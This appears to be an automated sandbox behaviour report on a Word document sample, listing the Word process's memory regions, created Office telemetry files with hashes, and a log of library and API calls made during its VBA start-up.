2f254f3d9d9c45f97a221faa02f071cba2beb92cc97848e09f6dc754a7585e95 (SHA256)
RRD-139857754091922.doc
Word Document
Created at 2018-04-05 07:19:00
Monitored Processes
Behavior Information - Sequential View
Process #1: winword.exe
246
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:16, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:16 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x998 |
| Parent PID | 0x5a8 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A6C
0x
A10
0x
A08
0x
9F8
0x
9F4
0x
9F0
0x
9EC
0x
9E8
0x
9E4
0x
9E0
0x
9DC
0x
9D8
0x
9D4
0x
9D0
0x
9B0
0x
9AC
0x
9A8
0x
9A4
0x
9A0
0x
99C
0x
A8C
0x
A90
0x
B04
0x
B08
0x
60C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00070fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00086fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00091fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00220fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00431fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00441fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00452fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00461fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0047ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0048ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00617fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x007a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x01baffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01bb0000 | 0x01e7efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000001e80000 | 0x01e80000 | 0x02272fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002280000 | 0x02280000 | 0x0237ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002380000 | 0x02380000 | 0x02382fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002390000 | 0x02390000 | 0x02392fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023a0000 | 0x023a0000 | 0x023a2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023b0000 | 0x023b0000 | 0x023b2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x023c2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x0240ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002410000 | 0x02410000 | 0x02417fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002420000 | 0x02420000 | 0x02420fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x02430fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x02440fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002450000 | 0x02450000 | 0x02450fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002460000 | 0x02460000 | 0x02487fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002490000 | 0x02490000 | 0x02490fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x024affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x026affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000026b0000 | 0x026b0000 | 0x0278efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002790000 | 0x02790000 | 0x027fafff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002800000 | 0x02800000 | 0x02800fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002810000 | 0x02810000 | 0x02811fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002820000 | 0x02820000 | 0x0289ffff | Private Memory | Readable, Writable |
|
|
|
- |
| index.dat | 0x028a0000 | 0x028abfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x028b0000 | 0x028b7fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x028c0000 | 0x028cbfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000028d0000 | 0x028d0000 | 0x028d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000028e0000 | 0x028e0000 | 0x028e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000028f0000 | 0x028f0000 | 0x028f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002900000 | 0x02900000 | 0x02900fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002910000 | 0x02910000 | 0x02914fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002920000 | 0x02920000 | 0x02a1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x02a20000 | 0x02adffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02ae0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02af0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002b00000 | 0x02b00000 | 0x02b01fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| msxml6r.dll | 0x02b10000 | 0x02b10fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02b20000 | 0x02b3ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002b40000 | 0x02b40000 | 0x02b40fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002b50000 | 0x02b50000 | 0x02b51fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b60000 | 0x02b60000 | 0x02c5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c60000 | 0x02c60000 | 0x02d5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002d60000 | 0x02d60000 | 0x02d61fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d80000 | 0x02d80000 | 0x02e7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002eb0000 | 0x02eb0000 | 0x02faffff | Private Memory | Readable, Writable |
|
|
|
- |
| segoeui.ttf | 0x02fb0000 | 0x0302efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000003060000 | 0x03060000 | 0x0306ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003090000 | 0x03090000 | 0x0310ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003110000 | 0x03110000 | 0x03241fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003260000 | 0x03260000 | 0x0335ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003380000 | 0x03380000 | 0x033fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003430000 | 0x03430000 | 0x0352ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003570000 | 0x03570000 | 0x0366ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003680000 | 0x03680000 | 0x0377ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003810000 | 0x03810000 | 0x0390ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003980000 | 0x03980000 | 0x039fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003a50000 | 0x03a50000 | 0x03acffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000003ae0000 | 0x03ae0000 | 0x03aeffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003ba0000 | 0x03ba0000 | 0x03c9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003cd0000 | 0x03cd0000 | 0x03cdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003ce0000 | 0x03ce0000 | 0x040dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004130000 | 0x04130000 | 0x0422ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000042c0000 | 0x042c0000 | 0x043bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000043c0000 | 0x043c0000 | 0x04702fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000047b0000 | 0x047b0000 | 0x048affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004990000 | 0x04990000 | 0x0499ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04b0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04c7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004c90000 | 0x04c90000 | 0x04d8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04e8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04ecffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04fcffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005070000 | 0x05070000 | 0x050effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005120000 | 0x05120000 | 0x0521ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000005220000 | 0x05220000 | 0x05a1ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005b10000 | 0x05b10000 | 0x05c0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| staticcache.dat | 0x05c10000 | 0x0653ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000006540000 | 0x06540000 | 0x06d3ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006d40000 | 0x06d40000 | 0x06f3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006f40000 | 0x06f40000 | 0x0773ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000007740000 | 0x07740000 | 0x0873ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008760000 | 0x08760000 | 0x0885ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000089e0000 | 0x089e0000 | 0x08a5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008a60000 | 0x08a60000 | 0x08e5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000036e00000 | 0x36e00000 | 0x36e0ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000036f30000 | 0x36f30000 | 0x36f3ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| osppc.dll | 0x74460000 | 0x74492fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x770b0000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| normaliz.dll | 0x770c0000 | 0x770c2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| winword.exe | 0x13f130000 | 0x13f30bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007febcee0000 | 0x7febcee0000 | 0x7febceeffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007febe330000 | 0x7febe330000 | 0x7febe33ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| msptls.dll | 0x7fee4910000 | 0x7fee4a83fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| adal.dll | 0x7fee4a90000 | 0x7fee4ba9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| riched20.dll | 0x7fee4bb0000 | 0x7fee4e4afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwrite.dll | 0x7fee4f70000 | 0x7fee50edfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d10warp.dll | 0x7fee50f0000 | 0x7fee52bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msointl.dll | 0x7fee52c0000 | 0x7fee545cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msores.dll | 0x7fee5460000 | 0x7fee9846fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso99lres.dll | 0x7fee9850000 | 0x7feea544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso40uires.dll | 0x7feea550000 | 0x7feea98cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso.dll | 0x7feea990000 | 0x7feec3bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso98win32client.dll | 0x7feec3c0000 | 0x7feed066fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feed070000 | 0x7feedb3efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso30win32client.dll | 0x7feedb40000 | 0x7feee223fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso20win32client.dll | 0x7feee230000 | 0x7feee6d2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oart.dll | 0x7feee6e0000 | 0x7feef664fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wwlib.dll | 0x7feef670000 | 0x7fef1e48fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x7fef1f80000 | 0x7fef2018fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x7fef2020000 | 0x7fef208efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wwintl.dll | 0x7fef2090000 | 0x7fef214ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d2d1.dll | 0x7fef2150000 | 0x7fef2231fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso50win32client.dll | 0x7fef2240000 | 0x7fef22cafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcp140.dll | 0x7fef22d0000 | 0x7fef236bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d11.dll | 0x7fef2370000 | 0x7fef2435fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x7fef3920000 | 0x7fef393bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x7fef3940000 | 0x7fef39a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| npmproxy.dll | 0x7fef4770000 | 0x7fef477bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msointl30.dll | 0x7fef4c90000 | 0x7fef4ca0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| c2r64.dll | 0x7fef4cc0000 | 0x7fef4ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
|
For performance reasons, the remaining 434 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\office\16.0\floodgate\word.settings.json | 0.08 KB |
MD5:
e4e83f8123e9740b8aa3c3dfa77c1c04
SHA1: 5281eae96efde7b0e16a1d977f005f0d3bd7aad0 SHA256: 6034f27b0823b2a6a76fe296e851939fd05324d0af9d55f249c79af118b0eb31 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\office\16.0\floodgate\word.surveyhistorystats.json | 0.01 KB |
MD5:
6ca4960355e4951c72aa5f6364e459d5
SHA1: 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 SHA256: 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\office\16.0\floodgate\word.surveyeventactivitystats.json | 0.01 KB |
MD5:
6ca4960355e4951c72aa5f6364e459d5
SHA1: 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 SHA256: 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\office\otele\{465e3f69-2650-4b51-9432-f12034cb1f3b} (0) - 2456 - winword.exe - otele.dat | 0.85 KB |
MD5:
1bca84e2ab366fd2ee293e5cdea126fa
SHA1: f6b538eec229168c909b359d921dfdfb6c43cbe9 SHA256: 29b4b2b30923c708019b13d4f3376839ffcc723011407efad9c33eebc27e1d9c |
|
|
Threads
Thread 0x99c
246
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-04-05 07:21:12 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 141508 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\program files\microsoft office\root\office16\winword.exe, base_address = 0x13f130000 |
|
1 | |
| Module | Load | module_name = Comctl32.dll, base_address = 0x7fefb970000 |
|
1 | |
| Module | Get Handle | module_name = MSI.DLL, base_address = 0x7fef9b60000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiProvideQualifiedComponentA, address_out = 0x7fef9be3b3c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiGetProductCodeA, address_out = 0x7fef9bda13c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiReinstallFeatureA, address_out = 0x7fef9be1618 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiProvideComponentA, address_out = 0x7fef9bdf088 |
|
1 | |
| Module | Get Handle | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee1df0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoVBADigSigCallDlg, address_out = 0x7fee1ef72c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoVbaInitSecurity, address_out = 0x7fee1e660b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFIEPolicyAndVersion, address_out = 0x7fee1e11a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee1e65f50 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFInitOffice, address_out = 0x7fee1e0f000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoUninitOffice, address_out = 0x7fee1dfe860 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFGetFontSettings, address_out = 0x7fee1df3fc0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoRgchToRgwch, address_out = 0x7fee1e02380 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHrSimpleQueryInterface, address_out = 0x7fee1df7b80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHrSimpleQueryInterface2, address_out = 0x7fee1df7b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateControl, address_out = 0x7fee1df8730 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFLongLoad, address_out = 0x7fee1f33260 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFLongSave, address_out = 0x7fee1f33280 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFGetTooltips, address_out = 0x7fee1e01f40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFSetTooltips, address_out = 0x7fee1e66370 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFLoadToolbarSet, address_out = 0x7fee1e54590 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateToolbarSet, address_out = 0x7fee1df55b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHpalOffice, address_out = 0x7fee1e00240 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFWndProcNeeded, address_out = 0x7fee1df3d10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFWndProc, address_out = 0x7fee1df6d30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateITFCHwnd, address_out = 0x7fee1df3d40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoDestroyITFC, address_out = 0x7fee1dfe6f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee1dfdf40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFGetComponentManager, address_out = 0x7fee1df7bf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee1dffcd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoWideCharToMultiByte, address_out = 0x7fee1df8b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHrRegisterAll, address_out = 0x7fee1ef2ef0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFSetComponentManager, address_out = 0x7fee1e042c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateStdComponentManager, address_out = 0x7fee1df3e20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFHandledMessageNeeded, address_out = 0x7fee1dfab10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoPeekMessage, address_out = 0x7fee1dfa7d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateIPref, address_out = 0x7fee1df1550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoDestroyIPref, address_out = 0x7fee1dfe830 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoChsFromLid, address_out = 0x7fee1df13d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoCpgFromChs, address_out = 0x7fee1df6660 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoSetLocale, address_out = 0x7fee1df1500 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee1df3dd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoSetVbaInterfaces, address_out = 0x7fee1ef71e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoGetControlInstanceId, address_out = 0x7fee1ec6d10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VbeuiFIsEdpEnabled, address_out = 0x7fee1f398e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VbeuiEnterpriseProtect, address_out = 0x7fee1f39830 |
|
1 | |
| Environment | Get Environment String | name = DDRYBUR |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL, base_address = 0x7fee2c00000 |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\Licenses |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = } |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x7fefe910000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SysFreeString, address_out = 0x7fefe911320 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLib, address_out = 0x7fefe91f1e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegisterTypeLib, address_out = 0x7fefe96caa0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = QueryPathOfRegTypeLib, address_out = 0x7fefe9a1760 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7fefe9a20d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleTranslateColor, address_out = 0x7fefe93c760 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreateFontIndirect, address_out = 0x7fefe96ecd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePictureIndirect, address_out = 0x7fefe96e840 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleLoadPicture, address_out = 0x7fefe97f420 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePropertyFrameIndirect, address_out = 0x7fefe974ec0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePropertyFrame, address_out = 0x7fefe979350 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleIconToCursor, address_out = 0x7fefe946e40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7fefe91a550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleLoadPictureEx, address_out = 0x7fefe97f320 |
|
1 | |
| Window | Create | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\user32.dll, base_address = 0x76df0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x76e094f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x76e05f08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x76e02b00 |
|
1 | |
